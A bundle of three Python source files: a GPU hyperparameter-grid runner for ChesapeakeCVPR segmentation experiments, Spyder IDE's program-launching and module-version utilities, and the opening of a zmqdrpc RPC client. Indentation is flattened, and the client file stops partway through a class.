run_chesapeake_cvpr_experiments.py
|
#!/usr/bin/env python3
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
"""Runs the train script with a grid of hyperparameters."""
import itertools
import os
import subprocess
from multiprocessing import Process, Queue
# list of GPU IDs that we want to use, one job will be started for every ID in the list
GPUS = [0]
DRY_RUN = False # if True then only print the commands to be run, if False then run them
DATA_DIR = "" # path to the ChesapeakeCVPR data directory
# Hyperparameter options
training_set_options = ["de"]
model_options = ["unet"]
encoder_options = ["resnet18", "resnet50"]
lr_options = [1e-2, 1e-3, 1e-4]
loss_options = ["ce", "jaccard"]
weight_init_options = ["null", "imagenet"]
def do_work(work: "Queue[str]", gpu_idx: int) -> bool:
"""Process for each ID in GPUS."""
while not work.empty():
experiment = work.get()
experiment = experiment.replace("GPU", str(gpu_idx))
print(experiment)
if not DRY_RUN:
subprocess.call(experiment.split(" "))
return True
if __name__ == "__main__":
work: "Queue[str]" = Queue()
for (train_state, model, encoder, lr, loss, weight_init) in itertools.product(
training_set_options,
model_options,
encoder_options,
lr_options,
loss_options,
weight_init_options,
):
experiment_name = f"{train_state}_{model}_{encoder}_{lr}_{loss}_{weight_init}"
output_dir = os.path.join("output", "chesapeake-cvpr_experiments")
log_dir = os.path.join(output_dir, "logs")
config_file = os.path.join("conf", "chesapeake_cvpr.yaml")
if not os.path.exists(os.path.join(output_dir, experiment_name)):
command = (
"python train.py"
+ f" config_file={config_file}"
+ f" experiment.name={experiment_name}"
+ f" experiment.module.segmentation_model={model}"
+ f" experiment.module.encoder_name={encoder}"
+ f" experiment.module.encoder_weights={weight_init}"
+ f" experiment.module.learning_rate={lr}"
+ f" experiment.module.loss={loss}"
+ " experiment.module.class_set=7"
+ f" experiment.datamodule.train_splits=['{train_state}-train']"
+ f" experiment.datamodule.val_splits=['{train_state}-val']"
+ f" experiment.datamodule.test_splits=['{train_state}-test']"
+ f" program.output_dir={output_dir}"
+ f" program.log_dir={log_dir}"
+ f" program.data_dir={DATA_DIR}"
+ " trainer.gpus=[GPU]"
)
command = command.strip()
work.put(command)
processes = []
for gpu_idx in GPUS:
p = Process(target=do_work, args=(work, gpu_idx))
processes.append(p)
p.start()
for p in processes:
p.join()
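# Illustrative note (not part of the original script): with the defaults above,
# one generated command would look roughly like
#   python train.py config_file=conf/chesapeake_cvpr.yaml
#   experiment.name=de_unet_resnet18_0.01_ce_null ... trainer.gpus=[0]
# where the "GPU" placeholder is replaced with the worker's GPU id inside do_work().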
|
programs.py
|
# -*- coding: utf-8 -*-
#
# Copyright © Spyder Project Contributors
# Licensed under the terms of the MIT License
# (see spyder/__init__.py for details)
"""Running programs utilities."""
from __future__ import print_function
# Standard library imports
from ast import literal_eval
from getpass import getuser
from textwrap import dedent
import glob
import importlib
import itertools
import os
import os.path as osp
import re
import subprocess
import sys
import tempfile
import threading
import time
# Third party imports
import pkg_resources
from pkg_resources import parse_version
import psutil
# Local imports
from spyder.config.base import (running_under_pytest, get_home_dir,
running_in_mac_app)
from spyder.py3compat import PY2, is_text_string, to_text_string
from spyder.utils import encoding
from spyder.utils.misc import get_python_executable
HERE = osp.abspath(osp.dirname(__file__))
class ProgramError(Exception):
pass
def get_temp_dir(suffix=None):
"""
Return the Spyder temporary directory, creating it if it does not exist.
"""
to_join = [tempfile.gettempdir()]
if os.name == 'nt':
to_join.append('spyder')
else:
username = encoding.to_unicode_from_fs(getuser())
to_join.append('spyder-' + username)
tempdir = osp.join(*to_join)
if not osp.isdir(tempdir):
os.mkdir(tempdir)
if suffix is not None:
to_join.append(suffix)
tempdir = osp.join(*to_join)
if not osp.isdir(tempdir):
os.mkdir(tempdir)
return tempdir
def is_program_installed(basename):
"""
Return program absolute path if installed in PATH.
Otherwise, return None.
Also searches specific platform dependent paths that are not already in
PATH. This permits general use without assuming user profiles are
sourced (e.g. .bash_profile), such as when login shells are not used to
launch Spyder.
On macOS systems, a .app is considered installed if it exists.
"""
home = get_home_dir()
req_paths = []
if sys.platform == 'darwin':
if basename.endswith('.app') and osp.exists(basename):
return basename
pyenv = [
osp.join('/usr', 'local', 'bin'),
osp.join(home, '.pyenv', 'bin')
]
# Prioritize Anaconda before Miniconda; local before global.
a = [osp.join(home, 'opt'), '/opt']
b = ['anaconda', 'miniconda', 'anaconda3', 'miniconda3']
conda = [osp.join(*p, 'condabin') for p in itertools.product(a, b)]
req_paths.extend(pyenv + conda)
elif sys.platform.startswith('linux'):
pyenv = [
osp.join('/usr', 'local', 'bin'),
osp.join(home, '.pyenv', 'bin')
]
a = [home, '/opt']
b = ['anaconda', 'miniconda', 'anaconda3', 'miniconda3']
conda = [osp.join(*p, 'condabin') for p in itertools.product(a, b)]
req_paths.extend(pyenv + conda)
elif os.name == 'nt':
pyenv = [osp.join(home, '.pyenv', 'pyenv-win', 'bin')]
a = [home, 'C:\\', osp.join('C:\\', 'ProgramData')]
b = ['Anaconda', 'Miniconda', 'Anaconda3', 'Miniconda3']
conda = [osp.join(*p, 'condabin') for p in itertools.product(a, b)]
req_paths.extend(pyenv + conda)
for path in os.environ['PATH'].split(os.pathsep) + req_paths:
abspath = osp.join(path, basename)
if osp.isfile(abspath):
return abspath
def find_program(basename):
"""
Find program in PATH and return absolute path
Try adding .exe or .bat to basename on Windows platforms
(return None if not found)
"""
names = [basename]
if os.name == 'nt':
# Windows platforms
extensions = ('.exe', '.bat', '.cmd')
if not basename.endswith(extensions):
names = [basename+ext for ext in extensions]+[basename]
for name in names:
path = is_program_installed(name)
if path:
return path
def get_full_command_for_program(path):
"""
Return the list of tokens necessary to open the program
at a given path.
On macOS systems, this function prefixes .app paths with
'open -a', which is necessary to run the application.
On all other OS's, this function has no effect.
:str path: The path of the program to run.
:return: The list of tokens necessary to run the program.
"""
if sys.platform == 'darwin' and path.endswith('.app'):
return ['open', '-a', path]
return [path]
def alter_subprocess_kwargs_by_platform(**kwargs):
"""
Given a dict, populate kwargs to create a generally
useful default setup for running subprocess processes
on different platforms. For example, `close_fds` is
set on posix and creation of a new console window is
disabled on Windows.
This function will alter the given kwargs and return
the modified dict.
"""
kwargs.setdefault('close_fds', os.name == 'posix')
if os.name == 'nt':
CONSOLE_CREATION_FLAGS = 0 # Default value
# See: https://msdn.microsoft.com/en-us/library/windows/desktop/ms684863%28v=vs.85%29.aspx
CREATE_NO_WINDOW = 0x08000000
# We "or" them together
CONSOLE_CREATION_FLAGS |= CREATE_NO_WINDOW
kwargs.setdefault('creationflags', CONSOLE_CREATION_FLAGS)
# ensure Windows subprocess environment has SYSTEMROOT
if kwargs.get('env') is not None:
# Is SYSTEMROOT, SYSTEMDRIVE in env? case insensitive
for env_var in ['SYSTEMROOT', 'SYSTEMDRIVE']:
if env_var not in map(str.upper, kwargs['env'].keys()):
# Add from os.environ
for k, v in os.environ.items():
if env_var == k.upper():
kwargs['env'].update({k: v})
break # don't risk multiple values
else:
# linux and macOS
if kwargs.get('env') is not None:
if 'HOME' not in kwargs['env']:
kwargs['env'].update({'HOME': get_home_dir()})
return kwargs
def run_shell_command(cmdstr, **subprocess_kwargs):
"""
Execute the given shell command.
Note that *args and **kwargs will be passed to the subprocess call.
If 'shell' is given in subprocess_kwargs it must be True,
otherwise ProgramError will be raised.
If 'executable' is not given in subprocess_kwargs, it will
be set to the value of the SHELL environment variable.
Note that stdin, stdout and stderr will be set by default
to PIPE unless specified in subprocess_kwargs.
:str cmdstr: The string run as a shell command.
:subprocess_kwargs: These will be passed to subprocess.Popen.
"""
if 'shell' in subprocess_kwargs and not subprocess_kwargs['shell']:
raise ProgramError(
'The "shell" kwarg may be omitted, but if '
'provided it must be True.')
else:
subprocess_kwargs['shell'] = True
# Don't pass SHELL to subprocess on Windows because it makes this
# function fail in Git Bash (where SHELL is declared; other Windows
# shells don't set it).
if not os.name == 'nt':
if 'executable' not in subprocess_kwargs:
subprocess_kwargs['executable'] = os.getenv('SHELL')
for stream in ['stdin', 'stdout', 'stderr']:
subprocess_kwargs.setdefault(stream, subprocess.PIPE)
subprocess_kwargs = alter_subprocess_kwargs_by_platform(
**subprocess_kwargs)
return subprocess.Popen(cmdstr, **subprocess_kwargs)
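# Usage sketch (added for illustration, not part of the original module):
# proc = run_shell_command('echo hello')
# stdout, stderr = proc.communicate()  # streams default to PIPE, so both are bytes
# Because shell=True is forced, cmdstr is interpreted by the user's shell
# (or by cmd.exe on Windows).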
def run_program(program, args=None, **subprocess_kwargs):
"""
Run program in a separate process.
NOTE: returns the process object created by
`subprocess.Popen()`. This can be used with
`proc.communicate()` for example.
If 'shell' appears in the kwargs, it must be False,
otherwise ProgramError will be raised.
If only the program name is given and not the full path,
a lookup will be performed to find the program. If the
lookup fails, ProgramError will be raised.
Note that stdin, stdout and stderr will be set by default
to PIPE unless specified in subprocess_kwargs.
:str program: The name of the program to run.
:list args: The program arguments.
:subprocess_kwargs: These will be passed to subprocess.Popen.
"""
if 'shell' in subprocess_kwargs and subprocess_kwargs['shell']:
raise ProgramError(
"This function is only for non-shell programs, "
"use run_shell_command() instead.")
fullcmd = find_program(program)
if not fullcmd:
raise ProgramError("Program %s was not found" % program)
# As per subprocess, we make a complete list of prog+args
fullcmd = get_full_command_for_program(fullcmd) + (args or [])
for stream in ['stdin', 'stdout', 'stderr']:
subprocess_kwargs.setdefault(stream, subprocess.PIPE)
subprocess_kwargs = alter_subprocess_kwargs_by_platform(
**subprocess_kwargs)
return subprocess.Popen(fullcmd, **subprocess_kwargs)
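# Usage sketch (added for illustration; assumes `git` is available on PATH):
# proc = run_program('git', ['--version'])
# out, err = proc.communicate()  # e.g. out == b'git version 2.x.y\n'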
def parse_linux_desktop_entry(fpath):
"""Load data from desktop entry with xdg specification."""
from xdg.DesktopEntry import DesktopEntry
try:
entry = DesktopEntry(fpath)
entry_data = {}
entry_data['name'] = entry.getName()
entry_data['icon_path'] = entry.getIcon()
entry_data['exec'] = entry.getExec()
entry_data['type'] = entry.getType()
entry_data['hidden'] = entry.getHidden()
entry_data['fpath'] = fpath
except Exception:
entry_data = {
'name': '',
'icon_path': '',
'hidden': '',
'exec': '',
'type': '',
'fpath': fpath
}
return entry_data
def _get_mac_application_icon_path(app_bundle_path):
"""Parse mac application bundle and return path for *.icns file."""
import plistlib
contents_path = os.path.join(app_bundle_path, 'Contents')
info_path = os.path.join(contents_path, 'Info.plist')
pl = {}
if os.path.isfile(info_path):
try:
# readPlist is deprecated but needed for py27 compat
pl = plistlib.readPlist(info_path)
except Exception:
pass
icon_file = pl.get('CFBundleIconFile')
icon_path = None
if icon_file:
icon_path = os.path.join(contents_path, 'Resources', icon_file)
# Some app bundles seem to list the icon name without extension
if not icon_path.endswith('.icns'):
icon_path = icon_path + '.icns'
if not os.path.isfile(icon_path):
icon_path = None
return icon_path
def get_username():
"""Return current session username."""
if os.name == 'nt':
username = os.getlogin()
else:
import pwd
username = pwd.getpwuid(os.getuid())[0]
return username
def _get_win_reg_info(key_path, hive, flag, subkeys):
"""
See: https://stackoverflow.com/q/53132434
"""
import winreg
reg = winreg.ConnectRegistry(None, hive)
software_list = []
try:
key = winreg.OpenKey(reg, key_path, 0, winreg.KEY_READ | flag)
count_subkey = winreg.QueryInfoKey(key)[0]
for index in range(count_subkey):
software = {}
try:
subkey_name = winreg.EnumKey(key, index)
if not (subkey_name.startswith('{')
and subkey_name.endswith('}')):
software['key'] = subkey_name
subkey = winreg.OpenKey(key, subkey_name)
for property in subkeys:
try:
value = winreg.QueryValueEx(subkey, property)[0]
software[property] = value
except EnvironmentError:
software[property] = ''
software_list.append(software)
except EnvironmentError:
continue
except Exception:
pass
return software_list
def _clean_win_application_path(path):
"""Normalize windows path and remove extra quotes."""
path = path.replace('\\', '/').lower()
# Check for quotes at start and end
if path[0] == '"' and path[-1] == '"':
path = literal_eval(path)
return path
def _get_win_applications():
"""Return all system installed windows applications."""
import winreg
# See:
# https://docs.microsoft.com/en-us/windows/desktop/shell/app-registration
key_path = 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths'
# Hive and flags
hfs = [
(winreg.HKEY_LOCAL_MACHINE, winreg.KEY_WOW64_32KEY),
(winreg.HKEY_LOCAL_MACHINE, winreg.KEY_WOW64_64KEY),
(winreg.HKEY_CURRENT_USER, 0),
]
subkeys = [None]
sort_key = 'key'
app_paths = {}
_apps = [_get_win_reg_info(key_path, hf[0], hf[1], subkeys) for hf in hfs]
software_list = itertools.chain(*_apps)
for software in sorted(software_list, key=lambda x: x[sort_key]):
if software[None]:
key = software['key'].capitalize().replace('.exe', '')
expanded_fpath = os.path.expandvars(software[None])
expanded_fpath = _clean_win_application_path(expanded_fpath)
app_paths[key] = expanded_fpath
# See:
# https://www.blog.pythonlibrary.org/2010/03/03/finding-installed-software-using-python/
# https://stackoverflow.com/q/53132434
key_path = 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall'
subkeys = ['DisplayName', 'InstallLocation', 'DisplayIcon']
sort_key = 'DisplayName'
apps = {}
_apps = [_get_win_reg_info(key_path, hf[0], hf[1], subkeys) for hf in hfs]
software_list = itertools.chain(*_apps)
for software in sorted(software_list, key=lambda x: x[sort_key]):
location = software['InstallLocation']
name = software['DisplayName']
icon = software['DisplayIcon']
key = software['key']
if name and icon:
icon = icon.replace('"', '')
icon = icon.split(',')[0]
if location == '' and icon:
location = os.path.dirname(icon)
if not os.path.isfile(icon):
icon = ''
if location and os.path.isdir(location):
files = [f for f in os.listdir(location)
if os.path.isfile(os.path.join(location, f))]
if files:
for fname in files:
fn_low = fname.lower()
valid_file = fn_low.endswith(('.exe', '.com', '.bat'))
if valid_file and not fn_low.startswith('unins'):
fpath = os.path.join(location, fname)
expanded_fpath = os.path.expandvars(fpath)
expanded_fpath = _clean_win_application_path(
expanded_fpath)
apps[name + ' (' + fname + ')'] = expanded_fpath
# Join data, skipping App Paths entries whose executable path was already found
values = set(apps.values())
for name, fpath in app_paths.items():
if fpath not in values:
apps[name] = fpath
return apps
def _get_linux_applications():
"""Return all system installed linux applications."""
# See:
# https://standards.freedesktop.org/desktop-entry-spec/desktop-entry-spec-latest.html
# https://askubuntu.com/q/433609
apps = {}
desktop_app_paths = [
'/usr/share/**/*.desktop',
'~/.local/share/**/*.desktop',
]
all_entries_data = []
for path in desktop_app_paths:
fpaths = glob.glob(path)
for fpath in fpaths:
entry_data = parse_linux_desktop_entry(fpath)
all_entries_data.append(entry_data)
for entry_data in sorted(all_entries_data, key=lambda x: x['name']):
if not entry_data['hidden'] and entry_data['type'] == 'Application':
apps[entry_data['name']] = entry_data['fpath']
return apps
def _get_mac_applications():
"""Return all system installed osx applications."""
apps = {}
app_folders = [
'/**/*.app',
'/Users/{}/**/*.app'.format(get_username())
]
fpaths = []
for path in app_folders:
fpaths += glob.glob(path)
for fpath in fpaths:
if os.path.isdir(fpath):
name = os.path.basename(fpath).split('.app')[0]
apps[name] = fpath
return apps
def get_application_icon(fpath):
"""Return application icon or default icon if not found."""
from qtpy.QtGui import QIcon
from spyder.utils.icon_manager import ima
if os.path.isfile(fpath) or os.path.isdir(fpath):
icon = ima.icon('no_match')
if sys.platform == 'darwin':
icon_path = _get_mac_application_icon_path(fpath)
if icon_path and os.path.isfile(icon_path):
icon = QIcon(icon_path)
elif os.name == 'nt':
pass
else:
entry_data = parse_linux_desktop_entry(fpath)
icon_path = entry_data['icon_path']
if icon_path:
if os.path.isfile(icon_path):
icon = QIcon(icon_path)
else:
icon = QIcon.fromTheme(icon_path)
else:
icon = ima.icon('help')
return icon
def get_installed_applications():
"""
Return all system installed applications.
The return value is a list of tuples where the first item is the icon path
and the second item is the program executable path.
"""
apps = {}
if sys.platform == 'darwin':
apps = _get_mac_applications()
elif os.name == 'nt':
apps = _get_win_applications()
else:
apps = _get_linux_applications()
if sys.platform == 'darwin':
apps = {key: val for (key, val) in apps.items() if osp.isdir(val)}
else:
apps = {key: val for (key, val) in apps.items() if osp.isfile(val)}
return apps
def open_files_with_application(app_path, fnames):
"""
Generalized method for opening files with a specific application.
Returns a dictionary of the command used and the return code.
A code equal to 0 means the application executed successfully.
"""
return_codes = {}
if os.name == 'nt':
fnames = [fname.replace('\\', '/') for fname in fnames]
if sys.platform == 'darwin':
if not (app_path.endswith('.app') and os.path.isdir(app_path)):
raise ValueError('`app_path` must point to a valid OSX '
'application!')
cmd = ['open', '-a', app_path] + fnames
try:
return_code = subprocess.call(cmd)
except Exception:
return_code = 1
return_codes[' '.join(cmd)] = return_code
elif os.name == 'nt':
if not (app_path.endswith(('.exe', '.bat', '.com', '.cmd'))
and os.path.isfile(app_path)):
raise ValueError('`app_path` must point to a valid Windows '
'executable!')
cmd = [app_path] + fnames
try:
return_code = subprocess.call(cmd)
except OSError:
return_code = 1
return_codes[' '.join(cmd)] = return_code
else:
if not (app_path.endswith('.desktop') and os.path.isfile(app_path)):
raise ValueError('`app_path` must point to a valid Linux '
'application!')
entry = parse_linux_desktop_entry(app_path)
app_path = entry['exec']
multi = []
extra = []
if len(fnames) == 1:
fname = fnames[0]
if '%u' in app_path:
cmd = app_path.replace('%u', fname)
elif '%f' in app_path:
cmd = app_path.replace('%f', fname)
elif '%U' in app_path:
cmd = app_path.replace('%U', fname)
elif '%F' in app_path:
cmd = app_path.replace('%F', fname)
else:
cmd = app_path
extra = fnames
elif len(fnames) > 1:
if '%U' in app_path:
cmd = app_path.replace('%U', ' '.join(fnames))
elif '%F' in app_path:
cmd = app_path.replace('%F', ' '.join(fnames))
if '%u' in app_path:
for fname in fnames:
multi.append(app_path.replace('%u', fname))
elif '%f' in app_path:
for fname in fnames:
multi.append(app_path.replace('%f', fname))
else:
cmd = app_path
extra = fnames
if multi:
for cmd in multi:
try:
return_code = subprocess.call([cmd], shell=True)
except Exception:
return_code = 1
return_codes[cmd] = return_code
else:
try:
return_code = subprocess.call([cmd] + extra, shell=True)
except Exception:
return_code = 1
return_codes[cmd] = return_code
return return_codes
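# Usage sketch (added for illustration; the .desktop path is hypothetical):
# codes = open_files_with_application(
#     '/usr/share/applications/org.gnome.gedit.desktop',
#     ['/tmp/a.txt', '/tmp/b.txt'])
# `codes` maps each command line that was executed to its return code,
# where 0 means the application launched successfully.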
def python_script_exists(package=None, module=None):
"""
Return absolute path if Python script exists (otherwise, return None)
package=None -> module is in sys.path (standard library modules)
"""
assert module is not None
if package is None:
spec = importlib.util.find_spec(module)
if spec:
path = spec.origin
else:
path = None
else:
spec = importlib.util.find_spec(package)
if spec:
path = osp.join(osp.dirname(spec.origin), module) + '.py'
else:
path = None
if path:
if not osp.isfile(path):
path += 'w'
if osp.isfile(path):
return path
def run_python_script(package=None, module=None, args=[], p_args=[]):
"""
Run Python script in a separate process
package=None -> module is in sys.path (standard library modules)
"""
assert module is not None
assert isinstance(args, (tuple, list)) and isinstance(p_args, (tuple, list))
path = python_script_exists(package, module)
run_program(sys.executable, p_args + [path] + args)
def shell_split(text):
"""
Split the string `text` using shell-like syntax
This avoids breaking single/double-quoted strings (e.g. containing
strings with spaces). This function is almost equivalent to the shlex.split
function (see standard library `shlex`) except that it is supporting
unicode strings (shlex does not support unicode until Python 2.7.3).
"""
assert is_text_string(text) # in case a QString is passed...
pattern = r'(\s+|(?<!\\)".*?(?<!\\)"|(?<!\\)\'.*?(?<!\\)\')'
out = []
for token in re.split(pattern, text):
if token.strip():
out.append(token.strip('"').strip("'"))
return out
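# Example (added for illustration): quoted segments survive the split and
# their surrounding quotes are stripped, e.g.
# shell_split('-q -o out.log "path with spaces/f.txt"')
# == ['-q', '-o', 'out.log', 'path with spaces/f.txt']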
def get_python_args(fname, python_args, interact, debug, end_args):
"""Construct Python interpreter arguments"""
p_args = []
if python_args is not None:
p_args += python_args.split()
if interact:
p_args.append('-i')
if debug:
p_args.extend(['-m', 'pdb'])
if fname is not None:
if os.name == 'nt' and debug:
# When calling pdb on Windows, one has to replace backslashes by
# slashes to avoid confusion with escape characters (otherwise,
# for example, '\t' will be interpreted as a tabulation):
p_args.append(osp.normpath(fname).replace(os.sep, '/'))
else:
p_args.append(fname)
if end_args:
p_args.extend(shell_split(end_args))
return p_args
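# Example (added for illustration), on a non-Windows platform:
# get_python_args('script.py', '-O', interact=False, debug=True,
#                 end_args='--foo 1')
# == ['-O', '-m', 'pdb', 'script.py', '--foo', '1']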
def run_python_script_in_terminal(fname, wdir, args, interact,
debug, python_args, executable=None):
"""
Run Python script in an external system terminal.
:str wdir: working directory, may be empty.
"""
if executable is None:
executable = get_python_executable()
# If fname or wdir has spaces, must be enclosed in quotes (all platforms)
if ' ' in fname:
fname = '"' + fname + '"'
if ' ' in wdir:
wdir = '"' + wdir + '"'
# If python_exe contains spaces, it can't be run on Windows, so we
# have to enclose them in quotes. Also wdir can come with / as os.sep, so
# we need to take care of it.
if os.name == 'nt':
wdir = wdir.replace('/', '\\')
executable = '"' + executable + '"'
p_args = [executable]
p_args += get_python_args(fname, python_args, interact, debug, args)
if os.name == 'nt':
cmd = 'start cmd.exe /K "'
if wdir:
cmd += 'cd ' + wdir + ' && '
cmd += ' '.join(p_args) + '"' + ' ^&^& exit'
# Command line and cwd have to be converted to the filesystem
# encoding before passing them to subprocess, but only for
# Python 2.
# See https://bugs.python.org/issue1759845#msg74142 and
# spyder-ide/spyder#1856.
if PY2:
cmd = encoding.to_fs_from_unicode(cmd)
wdir = encoding.to_fs_from_unicode(wdir)
try:
if wdir:
run_shell_command(cmd, cwd=wdir)
else:
run_shell_command(cmd)
except WindowsError:
from qtpy.QtWidgets import QMessageBox
from spyder.config.base import _
QMessageBox.critical(None, _('Run'),
_("It was not possible to run this file in "
"an external terminal"),
QMessageBox.Ok)
elif sys.platform.startswith('linux'):
programs = [{'cmd': 'gnome-terminal',
'wdir-option': '--working-directory',
'execute-option': '-x'},
{'cmd': 'konsole',
'wdir-option': '--workdir',
'execute-option': '-e'},
{'cmd': 'xfce4-terminal',
'wdir-option': '--working-directory',
'execute-option': '-x'},
{'cmd': 'xterm',
'wdir-option': None,
'execute-option': '-e'},]
for program in programs:
if is_program_installed(program['cmd']):
arglist = []
if program['wdir-option'] and wdir:
arglist += [program['wdir-option'], wdir]
arglist.append(program['execute-option'])
arglist += p_args
if wdir:
run_program(program['cmd'], arglist, cwd=wdir)
else:
run_program(program['cmd'], arglist)
return
elif sys.platform == 'darwin':
f = tempfile.NamedTemporaryFile('wt', prefix='run_spyder_',
suffix='.sh', dir=get_temp_dir(),
delete=False)
if wdir:
f.write('cd {}\n'.format(wdir))
if running_in_mac_app(executable):
f.write(f'export PYTHONHOME={os.environ["PYTHONPATH"]}\n')
f.write(' '.join(p_args))
f.close()
os.chmod(f.name, 0o777)
def run_terminal_thread():
proc = run_shell_command('open -a Terminal.app ' + f.name, env={})
# Prevent race condition
time.sleep(3)
proc.wait()
os.remove(f.name)
thread = threading.Thread(target=run_terminal_thread)
thread.start()
else:
raise NotImplementedError
def check_version(actver, version, cmp_op):
"""
Check version string of an active module against a required version.
If dev/prerelease tags result in TypeError for string-number comparison,
it is assumed that the dependency is satisfied.
Users on dev branches are responsible for keeping their own packages up to
date.
Copyright (C) 2013 The IPython Development Team
Distributed under the terms of the BSD License.
"""
if isinstance(actver, tuple):
actver = '.'.join([str(i) for i in actver])
try:
if cmp_op == '>':
return parse_version(actver) > parse_version(version)
elif cmp_op == '>=':
return parse_version(actver) >= parse_version(version)
elif cmp_op == '=':
return parse_version(actver) == parse_version(version)
elif cmp_op == '<':
return parse_version(actver) < parse_version(version)
elif cmp_op == '<=':
return parse_version(actver) <= parse_version(version)
else:
return False
except TypeError:
return True
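# Examples (added for illustration):
# check_version('0.24.1', '0.24', '>')  -> True
# check_version((4, 1), '4.2', '>=')    -> False  (tuples are joined to '4.1')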
def get_module_version(module_name):
"""Return module version or None if version can't be retrieved."""
mod = __import__(module_name)
ver = getattr(mod, '__version__', getattr(mod, 'VERSION', None))
if not ver:
ver = get_package_version(module_name)
return ver
def get_package_version(package_name):
"""Return package version or None if version can't be retrieved."""
# When support for Python 3.7 and below is dropped, this can be replaced
# with the built-in importlib.metadata.version
try:
ver = pkg_resources.get_distribution(package_name).version
return ver
except pkg_resources.DistributionNotFound:
return None
def is_module_installed(module_name, version=None, interpreter=None,
distribution_name=None):
"""
Return True if module ``module_name`` is installed
If ``version`` is not None, checks that the module's installed version is
consistent with ``version``. The module must have an attribute named
'__version__' or 'VERSION'.
``version`` may start with =, >=, >, < or <= to specify the requirement;
multiple conditions may be separated by ';' (e.g. '>=0.13;<1.0').
If ``interpreter`` is not None, checks if a module is installed with a
given ``version`` in the ``interpreter``'s environment. Otherwise checks
in Spyder's environment.
``distribution_name`` is the distribution name of a package. For instance,
for pylsp_black that name is python_lsp_black.
"""
if interpreter is not None:
if is_python_interpreter(interpreter):
cmd = dedent("""
try:
import {} as mod
except Exception:
print('No Module') # spyder: test-skip
print(getattr(mod, '__version__', getattr(mod, 'VERSION', None))) # spyder: test-skip
""").format(module_name)
try:
# use clean environment
proc = run_program(interpreter, ['-c', cmd], env={})
stdout, stderr = proc.communicate()
stdout = stdout.decode().strip()
except Exception:
return False
if 'No Module' in stdout:
return False
elif stdout != 'None':
# the module is installed and it has a version attribute
module_version = stdout
else:
module_version = None
else:
# Try to not take a wrong decision if interpreter check fails
return True
else:
# interpreter is None, just get module version in Spyder environment
try:
module_version = get_module_version(module_name)
except Exception:
# Module is not installed
return False
# This can happen if a package was not uninstalled correctly, for
# instance if its __pycache__ directory is left behind.
try:
mod = __import__(module_name)
if not getattr(mod, '__file__', None):
return False
except Exception:
pass
# Try to get the module version from its distribution name. For
# instance, pylsp_black doesn't have a version but that can be
# obtained from its distribution, called python_lsp_black.
if not module_version and distribution_name:
module_version = get_package_version(distribution_name)
if version is None:
return True
else:
if ';' in version:
versions = version.split(';')
else:
versions = [version]
output = True
for _ver in versions:
match = re.search(r'[0-9]', _ver)
assert match is not None, "Invalid version number"
symb = _ver[:match.start()]
if not symb:
symb = '='
assert symb in ('>=', '>', '=', '<', '<='),\
"Invalid version condition '%s'" % symb
ver = _ver[match.start():]
output = output and check_version(module_version, ver, symb)
return output
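# Example of the version syntax (added for illustration):
# is_module_installed('IPython', '>=7.0;<9.0')
# checks that IPython imports in Spyder's environment and that its
# __version__ satisfies both conditions; with interpreter='/path/to/python'
# (a hypothetical path) the check runs in that interpreter instead.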
def is_python_interpreter_valid_name(filename):
"""Check that the python interpreter file has a valid name."""
pattern = r'.*python(\d\.?\d*)?(w)?(.exe)?$'
if re.match(pattern, filename, flags=re.I) is None:
return False
else:
return True
def is_python_interpreter(filename):
"""Evaluate whether a file is a python interpreter or not."""
# Must be imported here to avoid circular import
from spyder.utils.conda import is_conda_env
real_filename = os.path.realpath(filename) # To follow symlink if existent
if (not osp.isfile(real_filename) or
not is_python_interpreter_valid_name(real_filename)):
return False
# File exists and has valid name
is_text_file = encoding.is_text_file(real_filename)
if is_pythonw(real_filename):
if os.name == 'nt':
# pythonw is a binary on Windows
if not is_text_file:
return True
else:
return False
elif sys.platform == 'darwin':
# pythonw is a text file in Anaconda but a binary in
# the system
if is_conda_env(pyexec=real_filename) and is_text_file:
return True
elif not is_text_file:
return True
else:
return False
else:
# There's no pythonw in other systems
return False
elif is_text_file:
# At this point we can't have a text file
return False
else:
return check_python_help(real_filename)
def is_pythonw(filename):
"""Check that the python interpreter has 'pythonw'."""
pattern = r'.*python(\d\.?\d*)?w(.exe)?$'
if re.match(pattern, filename, flags=re.I) is None:
return False
else:
return True
def check_python_help(filename):
"""Check that the python interpreter can compile and provide the zen."""
try:
proc = run_program(filename, ['-c', 'import this'], env={})
stdout, _ = proc.communicate()
stdout = to_text_string(stdout)
valid_lines = [
'Beautiful is better than ugly.',
'Explicit is better than implicit.',
'Simple is better than complex.',
'Complex is better than complicated.',
]
if all(line in stdout for line in valid_lines):
return True
else:
return False
except Exception:
return False
def is_spyder_process(pid):
"""
Test whether given PID belongs to a Spyder process.
This is checked by testing the first three command line arguments. This
function returns a bool. If there is no process with this PID or its
command line cannot be accessed (perhaps because the process is owned by
another user), then the function returns False.
"""
try:
p = psutil.Process(int(pid))
# Valid names for main script
names = set(['spyder', 'spyder3', 'spyder.exe', 'spyder3.exe',
'bootstrap.py', 'spyder-script.py', 'Spyder.launch.pyw'])
if running_under_pytest():
names.add('runtests.py')
# Check the first three command line arguments
arguments = set(os.path.basename(arg) for arg in p.cmdline()[:3])
conditions = [names & arguments]
return any(conditions)
except (psutil.NoSuchProcess, psutil.AccessDenied):
return False
def get_interpreter_info(path):
"""Return version information of the selected Python interpreter."""
try:
out, __ = run_program(path, ['-V']).communicate()
out = out.decode()
except Exception:
out = ''
return out.strip()
def find_git():
"""Find git executable in the system."""
if sys.platform == 'darwin':
proc = subprocess.run(
osp.join(HERE, "check-git.sh"), capture_output=True)
if proc.returncode != 0:
return None
return find_program('git')
else:
return find_program('git')
|
client.py
|
import importlib
import logging
import threading
import time
import uuid
import msgpack
import zmq
from .exceptions import Timeout, UnknownFormat, RemoteException, UnknownMessageType
LOGGER = logging.getLogger("zmqdrpc-client")
LOGGER.setLevel("WARNING")
_ = logging.StreamHandler()
_.setLevel('WARNING')
_.setFormatter(logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s'))
LOGGER.addHandler(_)
def gevent_patch():
global zmq
zmq = importlib.import_module('zmq.green')
class Replay():
def __init__(self, uid, timeout_at):
self.event = threading.Event()
self.timeout_at = timeout_at
self.uid = uid
def get(self):
now = time.time()
if self.poll():
return self.value
if self.timeout_at <= now:
raise Timeout("timeout")
if self.event.wait(self.timeout_at - now):
if self.is_exception:
raise self.value
return self.value
else:
raise Timeout("timeout")
def __set(self, value, is_exception=False):
self.is_exception = is_exception
self.value = value
self.event.set()
def poll(self):
return self.event.isSet()
class Call():
def __init__(self, name, client):
self.client = client
self.name = name
